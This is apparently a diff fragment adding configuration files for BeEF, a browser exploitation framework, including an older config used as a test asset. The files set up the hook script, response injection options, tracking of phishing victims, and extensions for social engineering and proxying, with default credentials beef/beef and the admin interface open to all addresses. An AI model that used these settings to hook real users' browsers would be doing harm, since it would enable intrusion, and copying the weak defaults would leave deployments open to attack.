+            # NOTE: works only on HTTPS domains and with HTTPS support enabled in BeEF
+            secure: true
+            secure_port: 61986 # WSSecure
+            ws_poll_timeout: 5000 # poll BeEF every x second, this affects how often the browser can have a command execute on it
+            ws_connect_timeout: 500 # useful to help fingerprinting finish before establishing the WS channel
+
+        # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
+        web_server_imitation:
+            enable: true
+            type: "apache" # Supported: apache, iis, nginx
+            hook_404: false # inject BeEF hook in HTTP 404 responses
+            hook_root: false # inject BeEF hook in the server home page
+        # Experimental HTTPS support for the hook / admin / all other Thin managed web services
+        https:
+            enable: false
+            # Enabled this config setting if you're external facing uri is using https
+            public_enabled: false
+            # In production environments, be sure to use a valid certificate signed for the value
+            # used in beef.http.public (the domain name of the server where you run BeEF)
+            key: "beef_key.pem"
+            cert: "beef_cert.pem"
+
+    database:
+        file: "beef.db"
+
+    # Autorun Rule Engine
+    autorun:
+        # this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterval
+        # to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or eventually
+        # continue execution regardless of results.
+        # If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase the timeout.
+        result_poll_interval: 300
+        result_poll_timeout: 5000
+
+        # If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain.
+        # This is useful to call modules (nested-forward chain mode) that are not returning their status/results.
+        continue_after_timeout: true
+
+    # Enables DNS lookups on zombie IP addresses
+    dns_hostname_lookup: false
+
+    # IP Geolocation
+    # NOTE: requires MaxMind database. Run ./updated-geoipdb to install.
+    geoip:
+        enable: true
+        database: '/opt/GeoIP/GeoLite2-City.mmdb'
+
+    # Integration with PhishingFrenzy
+    # If enabled BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
+    # to uniquely identify the victims. In this way you can easily associate phishing emails with hooked browser.
+    integration:
+        phishing_frenzy:
+            enable: false
+
+    # You may override default extension configuration parameters here
+    # Note: additional experimental extensions are available in the 'extensions' directory
+    #       and can be enabled via their respective 'config.yaml' file
+    extension:
+        admin_ui:
+            enable: true
+            base_path: "/ui"
+        demos:
+            enable: true
+        events:
+            enable: true
+        evasion:
+            enable: false
+        requester:
+            enable: true
+        proxy:
+            enable: true
+        network:
+            enable: true
+        metasploit:
+            enable: false
+        social_engineering:
+            enable: true
+        xssrays:
+            enable: true

spec/support/assets/config_old.yaml

@@ -0,0 +1,155 @@
+#
+# Copyright (c) 2006-2021 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# BeEF Configuration file
+
+beef:
+    version: '0.5.1.0'
+    # More verbose messages (server-side)
+    debug: false
+    # More verbose messages (client-side)
+    client_debug: false
+    # Used for generating secure tokens
+    crypto_default_value_length: 80
+
+    # Credentials to authenticate in BeEF.
+    # Used by both the RESTful API and the Admin interface
+    credentials:
+        user:   "beef"
+        passwd: "beef"
+
+    # Interface / IP restrictions
+    restrictions:
+        # subnet of IP addresses that can hook to the framework
+        permitted_hooking_subnet: ["0.0.0.0/0", "::/0"]
+        # subnet of IP addresses that can connect to the admin UI
+        #permitted_ui_subnet: ["127.0.0.1/32", "::1/128"]
+        permitted_ui_subnet: ["0.0.0.0/0", "::/0"]
+        # subnet of IP addresses that cannot be hooked by the framework
+        excluded_hooking_subnet: []
+        # slow API calls to 1 every  api_attempt_delay  seconds
+        api_attempt_delay: "0.05"
+
+    # HTTP server
+    http:
+        debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
+        host: "0.0.0.0"
+        port: "3000"
+
+        # Decrease this setting to 1,000 (ms) if you want more responsiveness
+        #  when sending modules and retrieving results.
+        # NOTE: A poll timeout of less than 5,000 (ms) might impact performance
+        #  when hooking lots of browsers (50+).
+        # Enabling WebSockets is generally better (beef.websocket.enable)
+        xhr_poll_timeout: 1000
+
+        # Host Name / Domain Name
+        # If you want BeEF to be accessible via hostname or domain name (ie, DynDNS),
+        #   set the public hostname below:
+        #public: ""      # public hostname/IP address
+
+        # Reverse Proxy / NAT
+        # If you want BeEF to be accessible behind a reverse proxy or NAT,
+        #   set both the publicly accessible hostname/IP address and port below:
+        # NOTE: Allowing the reverse proxy will enable a vulnerability where the ui/panel can be spoofed
+        #   by altering the X-FORWARDED-FOR ip address in the request header.
+        allow_reverse_proxy: false
+        #public: "example" # public hostname/IP address
+        #public_port: "" # public port (experimental)
+
+        # Hook
+        hook_file: "/hook.js"
+        hook_session_name: "BEEFHOOK"
+
+        # Allow one or multiple origins to access the RESTful API using CORS
+        # For multiple origins use: "http://browserhacker.com, http://domain2.com"
+        restful_api:
+            allow_cors: false
+            cors_allowed_domains: "http://browserhacker.com"
+
+        # Prefer WebSockets over XHR-polling when possible.
+        websocket:
+            enable: false
+            port: 61985 # WS: good success rate through proxies
+            # Use encrypted 'WebSocketSecure'
+            # NOTE: works only on HTTPS domains and with HTTPS support enabled in BeEF
+            secure: true
+            secure_port: 61986 # WSSecure
+            ws_poll_timeout: 5000 # poll BeEF every x second, this affects how often the browser can have a command execute on it
+            ws_connect_timeout: 500 # useful to help fingerprinting finish before establishing the WS channel
+
+        # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
+        web_server_imitation:
+            enable: true
+            type: "apache" # Supported: apache, iis, nginx
+            hook_404: false # inject BeEF hook in HTTP 404 responses
+            hook_root: false # inject BeEF hook in the server home page
+        # Experimental HTTPS support for the hook / admin / all other Thin managed web services
+        https:
+            enable: false
+            # Enabled this config setting if you're external facing uri is using https
+            public_enabled: false
+            # In production environments, be sure to use a valid certificate signed for the value
+            # used in beef.http.public (the domain name of the server where you run BeEF)
+            key: "beef_key.pem"
+            cert: "beef_cert.pem"
+
+    database:
+        file: "beef.db"
+
+    # Autorun Rule Engine
+    autorun:
+        # this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterval
+        # to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or eventually
+        # continue execution regardless of results.
+        # If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase the timeout.
+        result_poll_interval: 300
+        result_poll_timeout: 5000
+
+        # If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain.
+        # This is useful to call modules (nested-forward chain mode) that are not returning their status/results.
+        continue_after_timeout: true
+
+    # Enables DNS lookups on zombie IP addresses
+    dns_hostname_lookup: false
+
+    # IP Geolocation
+    # NOTE: requires MaxMind database. Run ./updated-geoipdb to install.
+    geoip:
+        enable: true
+        database: '/opt/GeoIP/GeoLite2-City.mmdb'
+
+    # Integration with PhishingFrenzy
+    # If enabled BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
+    # to uniquely identify the victims. In this way you can easily associate phishing emails with hooked browser.
+    integration:
+        phishing_frenzy:
+            enable: false
+
+    # You may override default extension configuration parameters here
+    # Note: additional experimental extensions are available in the 'extensions' directory
+    #       and can be enabled via their respective 'config.yaml' file
+    extension:
+        admin_ui:
+            enable: true
+            base_path: "/ui"
+        demos:
+            enable: true
+        events:
+            enable: true
+        evasion:
+            enable: false
+        requester:
+            enable: true
+        proxy:
+            enable: true
+        network:
+            enable: true
+        metasploit:
+            enable: false
+        social_engineering:
+            enable: true
+        xssrays:
+            enable: true